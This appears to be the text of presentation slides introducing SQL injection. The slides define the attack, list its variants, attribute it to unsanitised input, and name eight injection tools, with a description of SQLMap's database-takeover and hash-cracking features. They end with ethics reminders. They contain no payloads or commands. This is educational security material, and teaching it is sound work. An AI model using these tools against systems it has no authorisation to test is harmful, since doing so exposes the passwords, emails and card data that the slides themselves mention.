2. SQL injection is one of the most common attacks against web
applications.
This is used against websites which use SQL to query data from
the database server.
A successful SQL injection attack can read sensitive data
including email, username, password, and credit card details
from your database.
An attacker can not only read, but also modify or delete the data
from the database. So, SQL injection can be very harmful.
3. There are various kinds of SQL injection which are defined
based on scope, these are :-
Classic SQL injection
Blind SQL injection
Database specific SQL injection
Compound SQLI
4. SQL injection vulnerability exists because developers do not care about
data validation and security. User’s input must be sanitized before
passing into SQL queries, but developers forget to do this or do not
properly sanitize. This makes the web application vulnerable to SQL
injection attack.
To make the SQL injection attack process easy, developers have also
developed SQL injection tools by creating a good detection engine. With
every new release, these tools are becoming smarter. These tools take the
vulnerable URL as a parameter and then start attacking the target.
5. 1. SQLMap - Automatic SQL Injection And Database Takeover Tool
2. jSQL Injection - Java Tool For Automatic SQL Database Injection
3. BBQSQL - A Blind SQL Injection Exploitation Tool
4. NoSQLMap - Automated NoSQL Database Pwnage
5. Whitewidow - SQL Vulnerability Scanner
6. DSSS - Damn Small SQLi Scanner
7. explo - Human And Machine Readable Web Vulnerability Testing Format
8. Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting
LIST OF THE BEST SQL INJECTION TOOLS
6. SQLMap is the open source SQL injection tool and most popular among
all SQL injection tools available. This tool makes it easy to exploit the
SQL injection vulnerability of a web application and take over the
database server. It comes with a powerful detection engine which can
easily detect most of the SQL injection related vulnerabilities.
It supports a wide range of database servers, including MySQL, Oracle,
PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,
SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB. Most of the
popular database servers are already included. It also supports various
kind of SQL injection attacks, including boolean-based blind, time-based
blind, error-based, UNION query-based, stacked queries and out-of-band.
S Q L M A P
7. One good feature of the tool is that it comes with a built-in password
hash recognition system. It helps in identifying the password hash and
then cracking the password by performing a dictionary attack.
After connecting to a database server, this tool also lets you search for
specific database name, specific tables or for specific columns in the
whole database server.
8. A successful SQL injection attack can read sensitive
server data like passwords, email, username, etc. SQL
injection can be very harmful.
9. Respect the privacy of others.
Think before you type.
With great power comes great responsibility.